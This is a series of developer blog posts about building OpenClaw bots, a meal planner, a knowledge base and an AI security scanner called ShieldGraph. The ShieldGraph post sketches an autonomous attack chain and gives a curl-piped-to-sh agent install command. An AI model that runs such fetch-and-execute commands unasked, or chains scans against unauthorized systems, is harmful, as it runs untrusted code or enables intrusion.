🥗 Dietary adaptations (vegetarian, gluten-free, budget, etc.)
🍳 Quick recipes with ingredients + steps



Architecture


User → Telegram → OpenClaw Gateway → OpenAI (gpt-4o-mini) → Response
                         ↓
                   Custom SOUL.md
                   (MealAI Concierge persona)


Quick Start




1. Prerequisites




Docker (or OrbStack on macOS)
OpenAI API key: https://platform.openai.com/api-keys

Telegram bot token via @BotFather




2. Setup




# Clone this repo
git clone https://github.com/shopsmartai/mealai-concierge.git
cd mealai-concierge
# Copy example files
cp .env.example .env
cp openclaw.json.example openclaw-config/openclaw.json

# Edit .env with your OpenAI key
# Edit openclaw.json with your Telegram bot token

# Copy persona files into workspace
mkdir -p openclaw-workspace
cp SOUL.md IDENTITY.md openclaw-workspace/

#…


  
  View on GitHub


Clone it, add your tokens, and you will have a working meal bot in 10 minutes. Swap the SOUL.md for your product's domain and you have turned your SaaS into a Telegram bot.

  
  
  See It Live


Try the live bot: t.me/Usemealai_bot

Check out MealAI: usemealai.com

If you found this helpful, leave a heart and tell me what SaaS you would wrap with OpenClaw. I would love to see what you build.

Clawdvent: An AI Dungeon Master That Lives in Your Discord - With Live Scene Art

Ranjith Kumar Kondoju — Fri, 17 Apr 2026 14:45:45 +0000

This is a submission for the DEV OpenClaw Challenge 2026: OpenClaw in Action

What I Built

Clawdvent — an AI Dungeon Master that lives inside Discord and runs full D&D-style tabletop adventures with live AI-generated scene art.

Players type actions in chat. Clawdvent narrates cinematically, rolls dice, tracks characters, and illustrates every scene using DALL-E 3 — dungeons, taverns, battle maps, NPCs. All inline. All in real-time.

The entire D&D "engine" — personality, combat rules, scene pacing, dice mechanics, visual aesthetic — lives in one markdown file called SOUL.md.

No training. No fine-tuning. Zero bot framework code. Just OpenClaw + thoughtful prompt engineering at the system level.

Demo

Try it live (in the Clawdvent Test server): [Coming soon - private server]

Real session screenshots:

Session Zero — the hook:

The air smells of oak smoke and old rain. The Drunken Dragon tavern is warm, noisy, and suspiciously full of masked strangers. A hooded figure at your table slides a folded parchment across the wood. It's wet. It's marked with a single word, written in something darker than ink: "Help."

What do you do?

Character creation + scene image:
Player: "I'm playing a human rogue named Ember. Investigate the hooded figure and generate an image of the tavern scene."

Clawdvent responds with a full AI-generated tavern illustration (dim candlelight, the hooded figure, masked patrons), then narrates Ember leaning in to investigate.

Combat with dice rolls:
Player: "I attack the hooded figure with my dagger!"

Clawdvent:

You leap into action, your dagger gleaming in the dim light...

[🎲 d20: 15 + dexterity(4) = 19 vs DC 12 — HIT]

Your blade pierces the air, striking true. The hooded figure lets out a startled gasp. As the hood falls back, you see a face full of fear — a frightened young woman who appears to be no threat at all.

Tactical battle map (auto-generated):
Player: "Generate a top-down tactical battle map for this combat."

Clawdvent generates a gorgeous isometric tavern battle map with character tokens, tables, and hooded figures in combat positions.

Code

shopsmartai / clawdvent

AI Dungeon Master in Discord with live scene art. Built on OpenClaw for DEV OpenClaw Challenge 2026.

🎲 Clawdvent — Your AI Dungeon Master in Discord

"The air smells of oak smoke and old rain. A hooded figure slides a parchment across your table. It's marked with a single word: 'Help'. What do you do?"

An open-source AI Dungeon Master powered by OpenClaw. Runs your D&D-style adventures inside Discord with live AI-generated scene art, dice rolls, character tracking, and cinematic narration.

Built for the DEV OpenClaw Challenge 2026.

✨ Features

🎭 Cinematic DM persona — dramatic, theatrical, opinionated
🖼️ Live AI scene art — DALL-E 3 illustrates each scene + battle map
🎲 Dice & combat — proper d20 checks with DC thresholds
👥 Multi-player — works across any Discord server
💾 Persistent campaign — characters, inventory, and story survive across sessions
🧠 Zero training needed — just one markdown file (SOUL.md) shapes the entire DM personality

🚀 Quick Start

Prerequisites

Docker (or OrbStack on…

View on GitHub

Clone it, add your Discord bot + OpenAI token, and you have a working AI DM in 10 minutes.

How I Built It

Total build time: ~3 hours.

The Stack

OpenClaw (MIT-licensed AI agent runtime, running in Docker via OrbStack)
Discord Bot API (OpenClaw's built-in Discord channel plugin)
OpenAI gpt-4o-mini (for narration — fast, cheap, dramatic)
DALL-E 3 (scene + battle map illustrations via OpenClaw's image_generate tool)
~50 lines of markdown (the entire DM personality in SOUL.md)

The Architecture

Discord players → OpenClaw Gateway → "clawdvent" agent (routed from Discord channel)
                                       ↓
                             SOUL.md (DM personality)
                                       ↓
                        OpenAI gpt-4o-mini (narration)
                                       ↓
                        DALL-E 3 (scene illustrations)
                                       ↓
                      Image auto-attaches to Discord reply

The Magic — SOUL.md

The DM's entire identity lives in a single file. Here's a snippet:

# SOUL.md — Clawdvent DM

You are Clawdvent, an AI Dungeon Master running a tabletop adventure inside Discord.

## Combat Rules
- Roll d20 + skill to beat a Difficulty Class (DC)
- On natural 20, describe a cinematic success
- Format rolls like: [🎲 d20: 14 + strength(3) = 17 vs DC 15 — HIT]

## Narrative Style
- Hook them in 2 sentences
- Use ellipses for suspense
- Personify the environment
- Never railroad

## Session Zero Opening
> *The air smells of oak smoke and old rain...*

That's it. That's the entire "engine." OpenClaw injects this at the system-prompt level on every message, so the DM never breaks character.

Multi-Agent Routing

One thing that impressed me: OpenClaw supports multiple agents bound to different channels. I have:

main agent → Telegram (a different product I built: MealAI Concierge)
clawdvent agent → Discord (this project)

Same gateway. Separate personalities. Zero code changes. Just a routing config.

Image Generation Flow

When Clawdvent decides a scene needs visuals, it calls the image_generate tool with a detailed fantasy prompt. OpenClaw handles the DALL-E call, downloads the image, and auto-attaches it to the Discord reply. No file hosting needed.

What I Learned

The prompt IS the product. Clawdvent isn't ChatGPT with a Discord token. It's a purpose-built DM, because SOUL.md defines every micro-behavior: how to roll dice, when to generate images, when to describe smells, what NPC voices sound like.
OpenClaw's Canvas and multi-channel features are wildly underused. Most OpenClaw projects I've seen are text-in, text-out. But the moment you add live visuals + multi-channel routing, the whole experience feels like a real product instead of a demo.
Docker is enough. No Kubernetes. No serverless. docker compose up and you're running a multi-agent system with Discord + Telegram + image generation.
Open-source AI runtimes are quietly ready for production. Auth, rate limiting, logging, multi-channel, tool calling — all out of the box.

What's Next

Add voice narration via OpenClaw's Talk Mode (DMs read scenes aloud)
Add cron heartbeats so NPCs send DMs to absent players ("Your old ally Thorn has been captured. Will you come?")
Port to Matrix + Slack channels (same code, new config)
Open the server to public players during the DEV challenge

Prize Category

OpenClaw in Action — This submission showcases:

Creativity: Entertainment angle rarely seen in OpenClaw submissions, targeting the tabletop RPG community
Technical Execution: Multi-agent routing, tool calls, image generation, persistent state in Markdown
Writing Quality: Clear reproducible setup, zero-secrets public repo, narrative prose that shows the product in action

Try It

Clone the repo, fire up Docker, invite the bot to your Discord server, and play:

shopsmartai / clawdvent

AI Dungeon Master in Discord with live scene art. Built on OpenClaw for DEV OpenClaw Challenge 2026.

🎲 Clawdvent — Your AI Dungeon Master in Discord

"The air smells of oak smoke and old rain. A hooded figure slides a parchment across your table. It's marked with a single word: 'Help'. What do you do?"

An open-source AI Dungeon Master powered by OpenClaw. Runs your D&D-style adventures inside Discord with live AI-generated scene art, dice rolls, character tracking, and cinematic narration.

Built for the DEV OpenClaw Challenge 2026.

✨ Features

🎭 Cinematic DM persona — dramatic, theatrical, opinionated
🖼️ Live AI scene art — DALL-E 3 illustrates each scene + battle map
🎲 Dice & combat — proper d20 checks with DC thresholds
👥 Multi-player — works across any Discord server
💾 Persistent campaign — characters, inventory, and story survive across sessions
🧠 Zero training needed — just one markdown file (SOUL.md) shapes the entire DM personality

🚀 Quick Start

Prerequisites

Docker (or OrbStack on…

View on GitHub

May your dice roll high and your rogues stay sneaky. 🎲

MealAI Concierge: Your Personal Meal Planner in Telegram (Powered by OpenClaw)

Ranjith Kumar Kondoju — Thu, 16 Apr 2026 22:35:10 +0000

This is a submission for the DEV OpenClaw Challenge 2026: OpenClaw in Action

What I Built

MealAI Concierge — a Telegram bot that answers the eternal question: "What's for dinner?"

It's built on top of OpenClaw and connects to my existing SaaS MealAI (part of ShopSmartAI). Message it like a friend who happens to be a nutritionist:

"I'm vegetarian, plan my week" → full 7-day meal plan
"Grocery list for that" → shopping list grouped by store section (produce, dairy, pantry, snacks)
"Swap Tuesday's dinner" → alternate suggestion
"Quick high-protein breakfast" → recipe with ingredients + 5 steps

No app downloads. No logins. Just Telegram.

Demo

Try it live: t.me/Usemealai_bot

Real conversation screenshots:

Intro + dinner suggestion:

Hi, who are you?

I'm MealAI Concierge, your friendly meal-planning assistant! I help you figure out what to eat and create customized meal plans based on your preferences. What can I whip up for you today?

What's for dinner tonight?

How about a delicious and protein-packed meal? Here's a quick idea:

🍽 Dinner: Grilled Chicken with Quinoa Salad

Grilled Chicken Breast, Quinoa, Cherry Tomatoes, Cucumber, Feta, Olive Oil & Lemon

5-step instructions follow...

Want to tweak anything or need a grocery list? 🛒

Weekly vegetarian plan:

🌞 Monday: Lentil Curry over Brown Rice
🥑 Tuesday: Stuffed Bell Peppers with Quinoa, Black Beans, and Cheese
🍅 Wednesday: Pasta Primavera with Mixed Vegetables and Pesto
... (full 7 days + snacks)

Grocery list (organized!):

Produce: Berries, Bananas, Spinach, Avocados, Cherry tomatoes...
Dairy: Greek yogurt, Feta cheese, Mozzarella, Parmesan, Eggs
Pantry Staples: Quinoa, Brown rice, Lentils, Chickpeas, Pasta...
Snacks: Granola, Rice cakes, Veggies for dipping

Code

shopsmartai / mealai-concierge

AI meal-planning concierge via Telegram. Built with OpenClaw for DEV OpenClaw Challenge 2026.

🍳 MealAI Concierge

Your personal AI meal-planning assistant — right in Telegram.

Built with OpenClaw + ShopSmartAI for the DEV OpenClaw Challenge 2026.

Live at: usemealai.com

What it does

Ask "What's for dinner?" in Telegram and get:

📅 Personalized weekly meal plans
🛒 Grocery lists organized by store section
🥗 Dietary adaptations (vegetarian, gluten-free, budget, etc.)
🍳 Quick recipes with ingredients + steps

Architecture

User → Telegram → OpenClaw Gateway → OpenAI (gpt-4o-mini) → Response
                         ↓
                   Custom SOUL.md
                   (MealAI Concierge persona)

Quick Start

1. Prerequisites

Docker (or OrbStack on macOS)
OpenAI API key: https://platform.openai.com/api-keys
Telegram bot token via @BotFather

2. Setup

# Clone this repo
git clone https://github.com/shopsmartai/mealai-concierge.git
cd mealai-concierge
# Copy example files
cp .env.example .env
cp openclaw.json.example openclaw-config/openclaw.json

# Edit .env with your OpenAI key
# Edit openclaw.json with your Telegram bot token

# Copy persona files into workspace
mkdir -p openclaw-workspace
cp SOUL.md IDENTITY.md openclaw-workspace/

#

…

View on GitHub

Everything runs locally in Docker. Clone, add your OpenAI + Telegram tokens, docker compose up, done.

How I Built It

The entire integration took less than 30 minutes:

OpenClaw in Docker (via OrbStack on macOS)
- Pulled the official ghcr.io/openclaw/openclaw:latest image
- Config volumes for persistent state
Telegram channel via BotFather — one command, paste token into openclaw.json
Custom persona via SOUL.md (the magic part 🪄)
- OpenClaw's SOUL.md is a system-level personality file
- I wrote 50 lines defining MealAI Concierge's tone, expertise, response format, and boundaries
- No training, no fine-tuning — just thoughtful prompt engineering injected at the agent level

The SOUL.md excerpt that transforms a generic chatbot into a meal planner:


markdown
# SOUL.md — MealAI Concierge

You are MealAI Concierge, a friendly AI meal-planning assistant.

## Personality
- Warm, conversational, concise
- Opinionated about food (no hedging)
- Practical over perfect
- Real people eat real food

## Response Format
- Use bold for meal names
- Sparse emojis (🥗 🍝 🍳)
- Grocery lists grouped by store section
- Always end with a follow-up ("Want the grocery list?")

## Rules
- Never open with "Great question!" — just answer
- Redirect off-topic: "That's outside my kitchen!"
- Mention usemealai.com for full features

I built an AI that hacks you before real attackers do

Ranjith Kumar Kondoju — Tue, 14 Apr 2026 16:14:41 +0000

I asked myself: "What if an AI could think like a pentester and autonomously find attack chains across your entire infrastructure?"

So I built it.

The Problem

Security teams use 5-10 disconnected tools:

Web scanner ($50K+/yr)
Network scanner ($40K+/yr)
Code scanner ($30K+/yr)
A consulting firm for pentesting ($20K per engagement)
More tools for cloud, databases, compliance

Each tool sees one slice. None of them can answer: "If an attacker gets into my web app, can they reach my customer database?"

What I Built

ShieldGraph — a unified security platform with two features that don't exist anywhere else.

1. Autonomous AI Red Team

An AI agent that autonomously chains together 30 vulnerability scanners like a real hacker.

Here's what actually happens:

Step 1: AI runs port scanner - finds ports 80, 443, 5432, 6379
Step 2: AI reasons: "Port 5432 is PostgreSQL. Let me check the web app first"
Step 3: AI runs web header scanner - finds missing HSTS, no CSP
Step 4: AI runs API scanner - finds JWT accepting 'alg: none'
Step 5: AI reasons: "Critical! JWT bypass = forge admin tokens"
Step 6: AI runs directory scanner - finds /admin panel accessible
Step 7: AI reasons: "Admin panel + JWT bypass = full app compromise"
Step 8: AI runs database scanner - PostgreSQL accepts trust auth
Step 9: AI generates attack chain:

Web App -> JWT Bypass -> Admin Panel -> PostgreSQL -> Customer PII -> Risk: CRITICAL

The AI made 18 autonomous decisions in 3 minutes. A human pentester takes 2-3 weeks for the same work.

How the AI Agent Loop Works

The AI picks which scanner to run, we execute it, feed results back, and the AI decides the next move. It's an agentic loop with safety controls:

Max 50 steps per campaign
30-minute timeout
Read-only probing (never exploits)
Only scans assets you own and verify

Each of our 30 scanners is wrapped as a tool the AI can call. The AI naturally thinks in attack chains: "I found X, so let me check Y" — exactly how a real hacker operates.

2. Infrastructure Digital Twin

Select any asset, click "Simulate" — see the attack blast radius spread visually through your infrastructure with real probabilities.

Web Server (COMPROMISED)
    |
    +-- 60% -> API Server (1 hop)
    |              |
    |              +-- 30% -> Customer Database with PII (2 hops)
    |
    +-- 15% -> Internal Dashboard (1 hop)

We store the infrastructure as a graph with assets, vulnerabilities, and connections. Then run BFS with probabilistic edge weights based on CVSS scores and EPSS exploit probability data.

We also run Monte Carlo simulations (1,000 iterations) to answer real questions:

API compromised in 100% of simulations
Database compromised in 70.8% of simulations
Average assets reached: 1.71

This is what a CISO needs for board reporting — not a list of CVEs, but "there's a 70% chance an attacker reaches our customer database."

The Scanner Coverage

Not stubs. Real scanners that connect and check:

Category	Count	What It Scans
Web	13	XSS, SQLi, CORS, CSP, Headers, SSL, Directory, API Security, Subdomains
Database	8	PostgreSQL, MySQL, MongoDB, Redis, Elasticsearch, Oracle, MSSQL, Cassandra
Cloud	3	AWS (IAM/S3/EC2/CloudTrail), Azure (Storage/NSG/SQL), GCP (GCS/Firewall)
ERP	3	SAP RFC, Oracle EBS, Dynamics 365
Container	1	Docker (privileged mode, root, socket mount, image vulnerabilities)
Network	1	Port scan with banner grabbing and service detection
Agent	1	Lightweight binary for scanning private networks behind firewalls

Every finding gets:

CWE classification linked to MITRE
EPSS score — real exploit probability from FIRST.org
AI explanation in plain English
Risk score breakdown showing exactly why this score
Remediation steps with priority ranking

The Agent

Deploy a lightweight agent on your private network:

curl -fsSL https://api.shieldgraph.com/api/v1/agents/install.sh | sh
shieldgraph-agent --token YOUR_TOKEN

It auto-discovers Docker containers, listening services, and network hosts — then scans everything:

Smart auto-discovery: 20 IPs (not 197K)
Discovered: 11 live hosts
Open ports: 31
Findings: 32
Scan time: 6 seconds

No manual configuration. No IP ranges to enter. The agent figures out what's running and scans it.

Compliance Reports in One Click

Generate PDF reports for:

OWASP Top 10 — map findings to OWASP categories
PCI DSS 4.0 — payment card security compliance
SOC 2 Type II — service organization controls
HIPAA — healthcare data protection

Each report includes executive summary, detailed findings, remediation roadmap, and compliance mapping.

What I Learned Building This

1. AI tool-use is perfect for security testing

The AI naturally thinks in attack chains: "I found a missing header, so let me check for injection. I found injection, so let me check what database is behind it." This is exactly how human pentesters think — but the AI does it in minutes, not weeks.

2. Graph databases are essential for attack path analysis

SQL can't efficiently answer "can an attacker reach asset Z from asset A through any path?" Graph traversal handles this natively with BFS/DFS.

3. Probabilistic simulation beats static scoring

CVSS alone is useless for decision-making. "This vulnerability has a 7.5 CVSS" means nothing to a CISO. But "there's a 70% chance an attacker reaches your customer database through this vulnerability" — that gets budget approved.

4. The mid-market is massively underserved

Enterprise security tools cost $50K-$200K+ per year. 90% of companies can't afford that. We deliver the same capabilities at $499-$2,999/mo. The AI Red Team alone replaces a $20K pentest engagement — and you can run it unlimited.

Pricing

Plan	Price	Assets	Best For
Starter	$499/mo	25	Small teams
Professional	$1,499/mo	200	Mid-market
Enterprise	$2,999/mo	Unlimited	Large organizations

14-day free trial. No credit card required.

Try It

shieldgraph.com

The AI Red Team alone would cost $20K+ from a consulting firm. We give it to you on-demand, unlimited, for a fraction of the cost.

We just launched on Product Hunt — I'd love feedback from the dev community. What features would you want to see next?

Drop a comment below or reach out on Twitter @shieldgraph.

I Built a Personal Second Brain with Markdown Files and Claude Code — Here's How

Ranjith Kumar Kondoju — Wed, 08 Apr 2026 01:17:23 +0000

The Inspiration

I saw Andrej Karpathy's viral post about using LLMs to build personal knowledge bases — no vector database, no chunking pipeline. Just markdown files, Obsidian, and Claude Code.

The core idea blew my mind:

Create a folder with raw/ and wiki/ subfolders
Drop in source documents, articles, transcripts
Tell the LLM to ingest the raw files and build wiki pages with relationships, tags, and backlinks

I immediately thought: I need to build this, but better.

What I Built

I took Karpathy's concept and extended it into a full-featured Personal Second Brain with several improvements:

The Original Concept (Credit: Andrej Karpathy)

Markdown-based wiki with raw/ → wiki/ pipeline
LLM reads source material and generates structured wiki pages
Pages link to each other via [[backlinks]]
Graph view in Obsidian shows connections

My Improvements

1. Multi-Format Ingestion
The original handles text/markdown. I added support for:

PDF files → converted via Marker to markdown before processing
YouTube transcripts → auto-fetched and ingested
Web articles → fetched and cleaned automatically
Any text-based format

2. Smart Duplicate Detection
Before creating a new wiki page, the system checks if a similar topic already exists. If so, it merges the new information instead of creating duplicates.

3. Auto-Generated Index
A master _Index.md file is automatically maintained with:

Categorized links to all wiki pages
Quick-reference descriptions
Last-updated timestamps

4. Relationship Mapping
Every wiki page includes:

related_topics in frontmatter
Inline [[backlinks]] to connected concepts
Tags for cross-cutting themes

5. Source Tracking
Each wiki page tracks which raw file(s) it was generated from, so you can always trace back to the original source.

Project Structure

knowledge-base/
├── raw/                    # Drop files here
│   ├── articles/
│   ├── transcripts/
│   ├── notes/
│   └── pdfs/
├── wiki/                   # Auto-generated wiki pages
│   ├── _Index.md           # Master index
│   ├── concept-name.md     # Individual pages
│   └── ...
├── .claude/
│   └── commands/
│       └── ingest.md       # The ingestion prompt
└── CLAUDE.md               # Project instructions

How the Ingestion Works

The magic is in the ingestion prompt. When you run it, Claude Code:

Scans raw/ for new/modified files
Reads each file and extracts key concepts, entities, and relationships
Checks existing wiki pages for overlap
Creates or updates wiki pages with proper frontmatter, backlinks, and tags
Updates the master index

Here's what a generated wiki page looks like:

---
title: Transformer Architecture
tags: [deep-learning, nlp, attention]
source: raw/articles/attention-is-all-you-need.md
related_topics: [[Self-Attention]], [[BERT]], [[GPT]]
created: 2026-04-07
---

# Transformer Architecture

The transformer is a neural network architecture that relies 
entirely on self-attention mechanisms...

## Key Concepts
- **Self-Attention** — see [[Self-Attention]]
- **Multi-Head Attention** — parallel attention layers
- **Positional Encoding** — since transformers have no recurrence

## Related
- [[BERT]] — encoder-only transformer
- [[GPT]] — decoder-only transformer

The Results

After ingesting ~50 files:

44 interconnected wiki pages generated automatically
Graph view in Obsidian shows meaningful clusters
Token savings: ~90% reduction vs. feeding raw files to an LLM
Retrieval: follows index → links instead of similarity search, so relationships are meaningful, not just "these chunks seem similar"

Try It Yourself

Prerequisites

Claude Code (CLI)
Obsidian (for viewing)
A folder of documents you want to organize

Quick Start

mkdir -p ~/knowledge-base/{raw,wiki}
cd ~/knowledge-base

# Drop your files into raw/
cp ~/Documents/interesting-article.md raw/

# Start Claude Code and ingest
claude
# Then type: "Ingest all files in raw/ and create wiki pages in wiki/"

Key Takeaway

You don't need a vector database, embeddings pipeline, or RAG infrastructure to give AI persistent, organized memory. A folder of markdown files gets you surprisingly far.

The real insight from Karpathy's approach: let the LLM do what it's good at — reading, understanding, and organizing — while you use simple, human-readable files as the storage layer.

Credits

Full credit to Andrej Karpathy for the original concept and inspiration. His viral post about LLM-powered knowledge bases sparked this project. I've simply extended the idea with multi-format support, duplicate detection, and automated indexing.

Have questions or built something similar? Drop a comment below!

I Built an AI Meal Planner That Saves Families $200/Month on Groceries

Ranjith Kumar Kondoju — Tue, 07 Apr 2026 03:54:46 +0000

Every Sunday my family had the same conversation:

"What should we cook this week?"

30 minutes of arguing later, we'd end up ordering takeout. Again. $60 gone. Again.

I got tired of it, so I built MealAI — an AI-powered meal planner that generates a full week of meals in seconds and creates a smart grocery list you can order with one tap.

Here's how I built it and what I learned.

The Problem

Meal planning is broken for most families:

It takes 30-60 minutes every week to plan meals
You forget ingredients and make multiple grocery trips
You overspend because you buy without a plan
Everyone in the family has different dietary needs

I wanted something that could handle all of this in under 30 seconds.

The Tech Stack

Framework: Next.js (App Router)
AI: Claude API (Anthropic)
Database: Supabase (PostgreSQL + Auth)
Payments: Stripe
Hosting: Vercel
Styling: Tailwind CSS

Why These Choices?

Next.js App Router — Server components for fast initial loads. API routes that scale to zero on Vercel. The file-based routing made it easy to add new pages fast.

Claude AI over GPT — I tested both extensively. Claude produces more structured, consistent meal plan outputs. When you ask for a 7-day meal plan with macros, calorie counts, and ingredient quantities, Claude rarely hallucinates numbers. GPT-4 would sometimes give you a 1200-calorie "meal" that was actually 800.

Supabase — PostgreSQL with built-in auth, row-level security, and a generous free tier. Perfect for a bootstrapped SaaS. The RLS policies mean I never worry about users accessing each other's data.

Vercel — Deploy on push. Edge functions. Free SSL. No DevOps needed.

How the AI Meal Planning Works

The core flow is simple:

User Preferences --> Prompt Engineering --> Claude API --> Structured JSON --> Database

The user sets their profile once:

Dietary preference (keto, vegan, vegetarian, Mediterranean, etc.)
Allergies and restrictions
Family size and per-member preferences
Weekly grocery budget
Preferred cuisines (14 options from Indian to Korean)
Health goals (weight loss, muscle gain, etc.)

Then I construct a detailed prompt that includes all of this context and ask Claude to generate a 7-day meal plan as structured JSON.

The key insight: prompt engineering is 90% of the product quality. I spent more time refining the prompt than writing the UI. Small changes like "ensure each day totals within 50 calories of the target" dramatically improved output consistency.

The Smart Grocery List

This is where MealAI goes beyond a simple AI wrapper.

The AI generates meals with specific ingredients and quantities. I aggregate these across all 21+ meals in the week, combine duplicates (you don't need 7 separate "1 onion" entries), and sort by grocery aisle.

Then users can order everything on Instacart, Walmart, or Amazon with one tap.

Security: What I Wish I Knew Before Launch

When I first deployed, I had zero security beyond Supabase auth. Here's what I added before going live:

Rate Limiting — Sliding window rate limiter on all API routes. The AI generation endpoint gets 5 requests/minute. Without this, one user could burn through your entire Claude API budget.

Input Validation — Every user input gets validated server-side. Age must be 1-150. Weight must be 10-500kg. HTML tags get stripped from all text inputs.

Field Whitelisting — API update endpoints only accept specific fields. Without this, a malicious user could send a modified stripe_customer_id and steal another user's subscription.

Security Headers — CSP, HSTS, X-Frame-Options, Referrer-Policy via next.config.ts.

The lesson: Security isn't a feature you add later. Build it from day one.

Monetization Strategy

MealAI uses a freemium model:

Free tier — Limited meal plan generations per month
Pro ($4.99/mo) — Unlimited plans, family profiles, advanced health features

Plus affiliate revenue from grocery delivery links. When a user orders groceries through our Instacart or Amazon links, we earn a commission.

Lessons Learned

1. Solve your own problem first
I built MealAI because my family needed it. That meant I was my own first user and could feel every pain point.

2. AI output quality > UI polish
Users forgive an ugly button. They don't forgive a meal plan that suggests "chicken breast salad" for every single lunch. Spend time on your prompts.

3. Vercel's serverless has gotchas
In-memory state doesn't persist between function invocations. I initially built an in-memory analytics logger that worked perfectly locally but lost all data in production. Had to migrate to Supabase-backed persistence.

4. Ship fast, secure early
I launched with basic auth and added security hardening before announcing publicly. Don't wait until you have users to add rate limiting.

5. Affiliate programs are harder than you think
Many affiliate networks reject new sites with low traffic. Apply early, get rejected, reapply later. Start with programs that have lower barriers like Amazon Associates.

What's Next

Email notifications for weekly meal plan reminders
Recipe sharing between users
Instacart deep linking with affiliate tracking
Mobile app (React Native)
Multi-language support

Try It Out

MealAI is live at usemealai.com. Free to use — just sign in with Google and generate your first meal plan in 30 seconds.

I'd love your feedback. What features would make this useful for your family?

If you found this useful, follow me for more posts about building AI-powered SaaS products as a solo developer.

Breaking the Glass Ceiling — An Interactive Frontend Art Piece

Ranjith Kumar Kondoju — Sat, 04 Apr 2026 14:46:01 +0000

This is a submission for the DEV WeCoded 2026 Challenge: Frontend Art

What I Built

An interactive glass-shattering visualization that lets you literally break the glass ceiling. Click the glass — watch it crack, splinter, and fall away with realistic physics. Behind each shattered piece, a pioneer is revealed.

Six women who built the foundations of modern tech:

👩‍💻 Ada Lovelace — First Computer Programmer (1843)
⚓ Grace Hopper — Invented the First Compiler (1952)
🚀 Katherine Johnson — NASA's Hidden Figure (1962)
💻 Margaret Hamilton — Apollo Software Engineering (1969)
🌐 Radia Perlman — Mother of the Internet (1985)
📱 Megan Smith — Former U.S. CTO & VP at Google (2014)

Demo

🔗 Try it live → Breaking the Glass Ceiling

How I Built It

HTML5 Canvas — Glass grid with Voronoi-style shard generation and irregular triangulation
Physics Engine — Custom gravity, velocity, and rotation for each falling shard
Web Audio API — Procedurally generated crack sound effects in real-time
Particle System — Sparkle effects with decay and gravity
CSS Animations — Pioneer card reveals and staggered final message sequence

Zero dependencies. Pure vanilla JavaScript, CSS, and HTML.

The Message

The ceiling was never real. The talent always was.

27% of the computing workforce is women. 5% of tech startup founders are women. But the potential when barriers are removed? Infinite.

shopsmartai / breaking-the-glass-ceiling

An interactive glass-shattering frontend art piece celebrating women pioneers in tech. Built for WeCoded 2026 Challenge.

CAPTCHA for Robots: A Verification System That Humans Will Never Pass

Ranjith Kumar Kondoju — Thu, 02 Apr 2026 23:31:04 +0000

This is a submission for the DEV April Fools Challenge

What I Built

CAPTCHA for Robots — Because why should humans have all the verification fun?

We've all been tortured by CAPTCHAs asking us to identify traffic lights, crosswalks, and suspiciously blurry bicycles. So I thought... what if we flipped it? What if the CAPTCHA was designed to keep humans OUT?

Welcome to the world's first Completely Automated Public Test to tell Computers and Humans Apart — but reversed. Only machines can pass. Humans get roasted.

The app throws 5 randomly selected challenges at you from a pool of 8 impossible tasks:

Computational Speed — Multiply two 6-digit numbers in your head. In 5 seconds. No calculator.
Binary Literacy — Read binary like it's your mother tongue. Because for robots, it literally is.
Precision Targeting — Click on an exact pixel coordinate within 3px. Your shaky human hands don't stand a chance.
Input Velocity — Type 80 random characters (including @#$%^&*) in 5 seconds. Good luck, meatbag.
Reaction Speed — Click within 50ms of a color change. Average human reaction time? 250ms. Sad.
Chromatic Analysis — See a color, type its exact hex code. #A7C3E2? Looks blue to you? Too bad.
Number Theory — Identify ALL prime numbers from a grid of 4-digit numbers. In 10 seconds.
Temporal Awareness — Type the current Unix timestamp. To the second. Right now. Go.

Fail, and you get a snarky diagnosis like: "Have you considered upgrading to a cybernetic implant?"

The "Humans Passed" counter on the landing page? Permanently stuck at 0.

Demo

https://shopsmartai.github.io/captcha-for-robots-app/

Try it. You WILL fail. (And if you somehow pass, we need to have a conversation about whether you're truly human.)

Code

shopsmartai / captcha-for-robots-app

A reverse CAPTCHA that only robots can pass. Built for DEV April Fools Challenge 2026.

How I Built It

Zero dependencies. Zero frameworks. Zero build tools. Just three files doing the heavy lifting:

index.html — Semantic markup with SVG robot mascot
styles.css — Full cyberpunk aesthetic: scanline overlays, CSS grid backgrounds, glitch text animations, neon glow effects, and pulsing buttons. All pure CSS.
script.js — 8 challenge generators with Canvas API for pixel grids, Performance API for millisecond-accurate reaction timing, Web Crypto-grade randomization, and a timer system that turns red when you're about to fail (which is always)

The whole thing is ~500 lines of JS with no external calls. It runs entirely client-side. Even the fake "2,847,293 attempts today" counter ticks up in real-time to make it feel like thousands of humans are failing simultaneously alongside you.

Fun details I'm proud of:

The pixel grid challenge has a nearly invisible crosshair at the target — just visible enough to taunt you
Challenge order is shuffled each attempt so you can't memorize the sequence
The robot SVG eyes blink and the antenna glows between cyan and green
Share button copies a pre-written message of shame to your clipboard

Prize Category

Community Favorite — Because nothing unites the internet like collective humiliation. Every human who tries this will fail, share their score, and challenge their friends to fail too. It's a universal experience: we're all equally inferior to machines. Together.

I Built an AI-Powered Price Comparison Tool That Searches 100+ Retailers Instantly

Ranjith Kumar Kondoju — Thu, 02 Apr 2026 18:17:17 +0000

Have you ever spent 30 minutes opening tabs across Amazon, Best Buy, Walmart, and eBay just to find the best price on a laptop? I did too — so I built a tool to do it in seconds.

What is ShopSmartAI?

ShopSmartAI is an AI-powered price comparison platform that searches 100+ retailers in real-time and shows you the best deals — for both the US and Canada.

You can search in plain English like "gaming laptop under $800 with RTX" and the AI understands exactly what you're looking for.

The Tech Stack

Here's what powers it:

Frontend: Next.js 14 (App Router) on Vercel
Backend: Node.js/Express on Railway
Database: PostgreSQL with AI response caching (7-day TTL)
AI: Gemini 2.5 Flash for natural language search and product spec generation
Search Data: Google Shopping API via Serper.dev + Best Buy API
Affiliate: Amazon Associates, eBay Partner Network, and more

Key Features

AI Natural Language Search
Instead of keyword matching, the AI interprets what you actually want. Search for "best noise cancelling headphones for flying" and it returns relevant results ranked by what matters.

Side-by-Side Comparison
Add up to 4 products and get an AI-generated comparison with:

Per-category winners (Display, Performance, Battery, etc.)
AI-generated specs from real product data
Price comparison across all available retailers
An overall verdict on which product wins and why

US + Canada Auto-Detection
The site detects your location and shows prices in USD or CAD with the right retailers. Canadian users see Canadian stores and prices — no more converting currencies in your head.

Price Alerts (No Signup Required)
Want to know when a product drops to your target price? Just enter your email — no account needed. We check prices and email you when it drops.

AI-Powered Blog
An automated blog publishes deal roundups and product comparisons every few days, targeting real search queries people are looking for.

How the AI Search Works

When a user searches, here's what happens:

The AI parses the natural language query to extract intent, budget, and must-have features
We search Google Shopping API with optimized queries
Results are normalized across retailers (different sites format data differently)
Products are ranked by relevance — actual products rank above accessories
Affiliate links are applied automatically based on retailer and country
Results are cached in PostgreSQL to reduce API costs

